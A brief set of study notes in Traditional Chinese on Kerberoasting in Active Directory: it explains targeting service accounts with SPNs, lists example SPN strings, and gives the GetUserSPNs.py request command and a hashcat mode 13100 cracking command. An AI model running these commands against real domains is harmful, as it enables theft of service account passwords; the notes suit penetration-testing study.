Kerberoasting 火烤地獄犬

針對具有 SPNs 的服務帳戶
捕獲其TGS Ticket並離線破解
最終可以恢復服務帳戶的密碼

Service Principal Names (SPNs) ：
通常與服務帳戶相關聯
這些帳戶代表各種應用程序和服務
EX

• Microsoft SQL 伺服器: MSSQLSvc/sqlserver.domain.com:1433
• Web伺服器：HTTP/webserver.domain.com
• Exchange 伺服器：exchangeMDB/exchange.domain.com
• 打印服器：HOST/printserver.domain.com
• 文件服器：CIFS/fileserver.domain.com
• LDAP：LDAP/server.domain.com
• Kerberos：krbtgt/domain.com

指令
python3 GetUserSPNs.py -dc-ip 192.168.1.<AD> Domain.com/<account>:<password> -request

拉到最下面可以看到$krb5tgs$23$開頭的
整理一下丟給hashcat

hashcat -m 13100 tgs_hashes.txt /path/to/wordlist.txt